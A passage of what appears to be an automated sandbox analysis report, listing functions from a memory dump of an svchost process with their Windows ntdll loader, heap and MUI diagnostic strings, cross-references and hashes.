                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-3089669407
                                                                                        • Opcode ID: db5aecff6e16c53aec62dd5c72315dc931da0f385a515893bcac37371ae770ee
                                                                                        • Instruction ID: d46d88955cb22c59b8cec6b6214370edf8e4cef51fc505de2bcd91e23727e6d7
                                                                                        • Opcode Fuzzy Hash: db5aecff6e16c53aec62dd5c72315dc931da0f385a515893bcac37371ae770ee
                                                                                        • Instruction Fuzzy Hash: 8381FFB3D066187F8B51FBE8EDC4EEEB7BDAB15610B154462B910EB114E720ED048BA1
                                                                                        Function 03868620 Relevance: 19.0, Strings: 15, Instructions: 223COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Address of the debug info found in the active list., xrefs: 038A54AE, 038A54FA
                                                                                        • double initialized or corrupted critical section, xrefs: 038A5508
                                                                                        • Critical section debug info address, xrefs: 038A541F, 038A552E
                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 038A5543
                                                                                        • undeleted critical section in freed memory, xrefs: 038A542B
                                                                                        • ICwICw@4Cw@4Cw, xrefs: 038A5341, 038A534D
                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038A540A, 038A5496, 038A5519
                                                                                        • corrupted critical section, xrefs: 038A54C2
                                                                                        • Critical section address., xrefs: 038A5502
                                                                                        • Invalid debug info address of this critical section, xrefs: 038A54B6
                                                                                        • Thread identifier, xrefs: 038A553A
                                                                                        • 8, xrefs: 038A52E3
                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038A54E2
                                                                                        • Critical section address, xrefs: 038A5425, 038A54BC, 038A5534
                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038A54CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$ICwICw@4Cw@4Cw
                                                                                        • API String ID: 0-384127734
                                                                                        • Opcode ID: 95613daa4b5b6af0de8fc63d14033bbec1f93b92b0383d6a9c7f1447adbc7294
                                                                                        • Instruction ID: d03f357d873832e2e3325895d6bb117deba36cbb6829187350c1e2bb6cfb4aa0
                                                                                        • Opcode Fuzzy Hash: 95613daa4b5b6af0de8fc63d14033bbec1f93b92b0383d6a9c7f1447adbc7294
                                                                                        • Instruction Fuzzy Hash: 49819EB1A01758AFEB20CFD8C845BAEBBB9FB49704F144199E558FB241D375A980CB60
                                                                                        Function 03860F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                        • API String ID: 0-360209818
                                                                                        • Opcode ID: 2437f184256164f7cd689ac3e0489ad6349e48f68e1a7347c6f364fd0e5c37a9
                                                                                        • Instruction ID: 4389a3ad4f0ab7b2f7920238784d3c6f4729bd01812e0be29f574b20cb3adaa2
                                                                                        • Opcode Fuzzy Hash: 2437f184256164f7cd689ac3e0489ad6349e48f68e1a7347c6f364fd0e5c37a9
                                                                                        • Instruction Fuzzy Hash: 3162B0B5E006298FEB24CF98C8457A9B7B6BF85324F5882DAD449EB240D7325AD1CF40
                                                                                        Function 038E12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                        • API String ID: 0-3591852110
                                                                                        • Opcode ID: 55e912153af230f52bf92d2693c1106344e0f727ce4e86a99135a9ca4a8bc292
                                                                                        • Instruction ID: 9b605f4a8fa7d8b59a2eeaedf8a4f1308038c465da60f3647eb44ea7fa3d5e22
                                                                                        • Opcode Fuzzy Hash: 55e912153af230f52bf92d2693c1106344e0f727ce4e86a99135a9ca4a8bc292
                                                                                        • Instruction Fuzzy Hash: A012BC74604655EFC725CFA8C449BBABBE5FF0A704F1884D9E496CB681E738E881CB50
                                                                                        Function 0384AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                        • API String ID: 0-3197712848
                                                                                        • Opcode ID: 2b4c216d7e067104d7a8cbc190a366e52d929ee678031ef877fedae8d3c85bb8
                                                                                        • Instruction ID: 3ecefee2b232ba6a6bb530903f08bd6f1562d6c77d4a220bdcbd28c1974bf1ec
                                                                                        • Opcode Fuzzy Hash: 2b4c216d7e067104d7a8cbc190a366e52d929ee678031ef877fedae8d3c85bb8
                                                                                        • Instruction Fuzzy Hash: 6512E475A083498FD724DFA8C440BAAB7E4BF85704F08099EF985DF681E778D944CB52
                                                                                        Function 0382D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                        • API String ID: 0-3532704233
                                                                                        • Opcode ID: 1af99b6ba4e4d7a1a36ae7ff7518ab936584d6f8338201cea88cc394d9314913
                                                                                        • Instruction ID: 599b139e1f6914bea06726ce2afabe72f6164afde32a367a0bf8934d952f2ba3
                                                                                        • Opcode Fuzzy Hash: 1af99b6ba4e4d7a1a36ae7ff7518ab936584d6f8338201cea88cc394d9314913
                                                                                        • Instruction Fuzzy Hash: 91B1CE715083659FC711DFA8C880A6BBFE8BF84704F0549AEF8A9D7240D774D989CB92
                                                                                        Function 038E0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                        • API String ID: 0-1357697941
                                                                                        • Opcode ID: 141df5b510321a04c1db1eb5978af163fbc0b431437964f656c1bbcbe0ef6ddd
                                                                                        • Instruction ID: addd9cc1935541c04c73e98842692ae88e0f4231c4cc4fe60fe073c66b31fcc5
                                                                                        • Opcode Fuzzy Hash: 141df5b510321a04c1db1eb5978af163fbc0b431437964f656c1bbcbe0ef6ddd
                                                                                        • Instruction Fuzzy Hash: 62F1F075A04295EFCB25CFAAC440BAAFBF5FF0A304F0844D9E481DB282D774A985CB51
                                                                                        Function 038C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                        • API String ID: 0-3063724069
                                                                                        • Opcode ID: c9f1564c925f9fce90b5bf7082112715277ddbdd8c0cca94a4ae39ca245b1824
                                                                                        • Instruction ID: aac8c23a1b95a431bc2d1788e6f9834bff80ac7dae3e261a99a7adc821c4cc95
                                                                                        • Opcode Fuzzy Hash: c9f1564c925f9fce90b5bf7082112715277ddbdd8c0cca94a4ae39ca245b1824
                                                                                        • Instruction Fuzzy Hash: F0D1C072814395AFD721DAE8C840FABB7ECAF84714F0449EDFA94DB250E774C9448B92
                                                                                        Function 038E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                        • API String ID: 0-1700792311
                                                                                        • Opcode ID: 10020bd03cbb14eda7a54ba2dae5cec391beae3da0655dea59acfb178b6494c4
                                                                                        • Instruction ID: f3972ab6122a555f2feedc17d37bdf20521cacc1b90ce15658914ca8e45b6795
                                                                                        • Opcode Fuzzy Hash: 10020bd03cbb14eda7a54ba2dae5cec391beae3da0655dea59acfb178b6494c4
                                                                                        • Instruction Fuzzy Hash: 47D1CCB5504785EFCB22DFEAC440AADBBF1FF4A604F088889E455EB252D7B49981CB11
                                                                                        Function 0382D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0382D0CF
                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0382D146
                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 0382D196
                                                                                        • @, xrefs: 0382D313
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0382D2C3
                                                                                        • @, xrefs: 0382D2AF
                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0382D262
                                                                                        • @, xrefs: 0382D0FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                        • API String ID: 0-1356375266
                                                                                        • Opcode ID: 2aed5addc68bd37fd294646e8087038a9a4dbca997706114ccd789d24a7bb2bb
                                                                                        • Instruction ID: 4d98739f4f027daedb79b0a89a7f65b70ba117ff6fdb191219e4ee39d379a7fe
                                                                                        • Opcode Fuzzy Hash: 2aed5addc68bd37fd294646e8087038a9a4dbca997706114ccd789d24a7bb2bb
                                                                                        • Instruction Fuzzy Hash: 5FA18A719083559FD321DFA4C484B5BFBE8BB84715F004DAEE5A8D6280E778D948CB93
                                                                                        Function 03849EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • minkernel\ntdll\sxsisol.cpp, xrefs: 03897713, 038978A4
                                                                                        • Internal error check failed, xrefs: 03897718, 038978A9
                                                                                        • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03897709
                                                                                        • @, xrefs: 03849EE7
                                                                                        • sxsisol_SearchActCtxForDllName, xrefs: 038976DD
                                                                                        • Status != STATUS_NOT_FOUND, xrefs: 0389789A
                                                                                        • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 038976EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                        • API String ID: 0-761764676
                                                                                        • Opcode ID: a855913dab3de5cb1ff70043f979c8308ccbda9f2552a58a16d6e16f8ffde13a
                                                                                        • Instruction ID: 7476e6fbc6530adba34835495c41ccf5f14115a0d8123132f444b23b3e31d1ff
                                                                                        • Opcode Fuzzy Hash: a855913dab3de5cb1ff70043f979c8308ccbda9f2552a58a16d6e16f8ffde13a
                                                                                        • Instruction Fuzzy Hash: 24127D74900219DFDF24CFE8C881AAEB7B4FF48714F1880EAE849EB641E7349851CB65
                                                                                        Function 0383EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                        • API String ID: 0-1109411897
                                                                                        • Opcode ID: e5cf79e90fbedc6817790a6420623f06961e0c9d55053eeb8975d5d1c30788a2
                                                                                        • Instruction ID: df14005db39f2b8e34578df596907b4aedf6cc38400e450254ef343800341737
                                                                                        • Opcode Fuzzy Hash: e5cf79e90fbedc6817790a6420623f06961e0c9d55053eeb8975d5d1c30788a2
                                                                                        • Instruction Fuzzy Hash: 6CA22775E056698BEF64CF99C8887ADB7B5AF45304F1842EAD809E7350DB349E81CF80
                                                                                        Function 0382F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-523794902
                                                                                        • Opcode ID: cde719cf0df9a404107fc279bb45bb8d651a2912684d66f56a119d393bede752
                                                                                        • Instruction ID: 45c601125b1fa07ce6d997f46f7f3db30cdc3a0317b7434775ff1570931b17f7
                                                                                        • Opcode Fuzzy Hash: cde719cf0df9a404107fc279bb45bb8d651a2912684d66f56a119d393bede752
                                                                                        • Instruction Fuzzy Hash: 4942FD752083859FC715EFA8C884A2AFBE5FF85208F0849EDE595CB381D734E985CB52
                                                                                        Function 0383ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                        • API String ID: 0-4098886588
                                                                                        • Opcode ID: 1ada03528f3a1f4971977e76ce9538a2172a98fe772a36efc373fe835d62a2a1
                                                                                        • Instruction ID: a2061e148f64e89edecf73cc3e287c2f358b341bd750820fca347cf2b2ca3227
                                                                                        • Opcode Fuzzy Hash: 1ada03528f3a1f4971977e76ce9538a2172a98fe772a36efc373fe835d62a2a1
                                                                                        • Instruction Fuzzy Hash: DC32D1B49042698BEF22CB94CC94BEEB7B9AF46344F1841E6E449E7350D7759E80CF80
                                                                                        Function 0384B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                        • API String ID: 0-122214566
                                                                                        • Opcode ID: 0989240330d2a2e1ae20f7427a941ea35e34209c04385bacb3654b9efd32f6c5
                                                                                        • Instruction ID: 300141ed59f016e043bd6a0ec2ccc6de703499d8a2f47aa16fcbb449c78f9a34
                                                                                        • Opcode Fuzzy Hash: 0989240330d2a2e1ae20f7427a941ea35e34209c04385bacb3654b9efd32f6c5
                                                                                        • Instruction Fuzzy Hash: 52C10831A0025DABDF25CBF9C88077EB7A5AF85314F1840E9E885DFA81E7B4D944C391
                                                                                        Function 038663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-792281065
                                                                                        • Opcode ID: 7c64e910dbadfdf58c3f5c6891263bbf695d4ebcc070223b6bf1e037a4a444a6
                                                                                        • Instruction ID: 6311854383b9c96117011b5153a5246d3501a1668c3649e5bb617a90724edfb3
                                                                                        • Opcode Fuzzy Hash: 7c64e910dbadfdf58c3f5c6891263bbf695d4ebcc070223b6bf1e037a4a444a6
                                                                                        • Instruction Fuzzy Hash: 84913731A04B549BEB34EFEDD844BAEB7A4EB41714F1805E8D410EF781E7B49801C791
                                                                                        Function 0386C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 038A8181, 038A81F5
                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 038A8170
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0386C6C3
                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 038A81E5
                                                                                        • LdrpInitializeImportRedirection, xrefs: 038A8177, 038A81EB
                                                                                        • LdrpInitializeProcess, xrefs: 0386C6C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 0-475462383
                                                                                        • Opcode ID: 59fc3d724a3fb39214bfadacfbd043ee47e76999de6191e7ebed9d861d9e0e6b
                                                                                        • Instruction ID: 601233e065b678449226910a02a548893fb43ddd7dd1964cfef1d7250b2d4d18
                                                                                        • Opcode Fuzzy Hash: 59fc3d724a3fb39214bfadacfbd043ee47e76999de6191e7ebed9d861d9e0e6b
                                                                                        • Instruction Fuzzy Hash: A831E4756487459FD220EFACDD45E2AB7A4AF84B10F0409D8F885EF391EA64ED04C7A3
                                                                                        Function 038B9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                        • API String ID: 0-3127649145
                                                                                        • Opcode ID: a81be2431561402631e6e4ee1f7b36c0c87512f9345a5eaa877c5072531886ef
                                                                                        • Instruction ID: 86d5b25da16ab8bfd1e52600a495e8a9efdf128df0801599ec3ed647a0f45a00
                                                                                        • Opcode Fuzzy Hash: a81be2431561402631e6e4ee1f7b36c0c87512f9345a5eaa877c5072531886ef
                                                                                        • Instruction Fuzzy Hash: AC324975A0171A9BDB61DFA5CC88B9AB7F8FF48304F1041EAD509EB250DB74AA84CF50
                                                                                        Function 03849950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                        • API String ID: 0-3393094623
                                                                                        • Opcode ID: 76e8018a9e5825eb17dd7b4c31fbca2a4b2aca62f8faea7833106a25ba46b3cb
                                                                                        • Instruction ID: 28a52e8947e945dd87aaa0c2ef151714c23dd11c969c4c935794800c5b9a000d
                                                                                        • Opcode Fuzzy Hash: 76e8018a9e5825eb17dd7b4c31fbca2a4b2aca62f8faea7833106a25ba46b3cb
                                                                                        • Instruction Fuzzy Hash: AE024871508359CBDB30CFA8C084B6BF7E5AF89714F48899EE899CB650E774D844CB92
                                                                                        Function 038551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 03855247
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 0385542B
                                                                                        • WindowsExcludedProcs, xrefs: 0385522A
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 03855352
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 0385527B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 0-258546922
                                                                                        • Opcode ID: be7ce3016851651fe63c1eef4913f679d60932aed7faaed9657a312a3a6a69ee
                                                                                        • Instruction ID: c8881468731236dab3c0f7c878631efc9c9966eac8436dcd325f7ad1b4be30a4
                                                                                        • Opcode Fuzzy Hash: be7ce3016851651fe63c1eef4913f679d60932aed7faaed9657a312a3a6a69ee
                                                                                        • Instruction Fuzzy Hash: 87F13C76D00218EFCF15DFE8C980AEEBBB9EF49650F15409AE905EB250D7749E01CBA0
                                                                                        Function 038B4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                        • API String ID: 0-2518169356
                                                                                        • Opcode ID: d4790f6d02816c16458d396e9399f7267df27980041092c2c8718057717f994c
                                                                                        • Instruction ID: 6feca330fb00c298aa3f9279d2bb7cb95110034bdd43bedbb6945aa02311f766
                                                                                        • Opcode Fuzzy Hash: d4790f6d02816c16458d396e9399f7267df27980041092c2c8718057717f994c
                                                                                        • Instruction Fuzzy Hash: 9391CE76D0061A9BCB21CFA9C881AFEB7B5FF4A310F5941A9E810EB350D775DA01CB91
                                                                                        Function 0385D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-1975516107
                                                                                        • Opcode ID: 3ed076a424539625d5a9f014418438c1ed4b9f24f84d16645ae1d83e39fcea10
                                                                                        • Instruction ID: c1fb34290ba8be63d16ad3ec2f68057befe603d2b51c2f046e858c68c58cafc7
